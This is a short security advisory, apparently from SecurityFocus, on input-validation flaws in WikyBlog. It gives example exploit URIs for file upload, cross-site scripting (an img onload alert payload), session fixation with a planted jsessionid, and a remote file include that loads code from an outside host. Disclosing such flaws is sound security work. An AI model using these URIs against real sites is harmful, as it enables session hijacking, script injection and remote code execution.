WikyBlog Multiple Remote Input Validation Vulnerabilities

An attacker can exploit these issues via a browser. To exploit the cross-site scripting and session-fixation issues, the attacker needs to entice a user to follow a malicious link.

The following example URIs are available:

File upload:
http://www.example.com/Wiky/index.php/Attach/(your name)?cmd=uploadform

Cross-site scripting:
http://www.example.com/Wiky/index.php/Special/Main/Templates?cmd=copy&which=<img+src=http://www.example.com/HomeComputer.jpg+onload=alert(213771818860)>

Session fixation:
http://www.example.com/Wiky/index.php/Comment/Main/;jsessionid=indoushkasessionfixation
http://www.example.com/Wiky/index.php/Comment/Main/Home_Wiky/;jsessionid=indoushkasessionfixation
http://www.example.com/Wiky/index.php/Edit/Main/;jsessionid=indoushkasessionfixation

Remote file include:
http://www.example.com/Wiky/include/WBmap.php?langFile=http://www.example2.com/c.txt?


 

Privacy Statement
Copyright 2010, SecurityFocus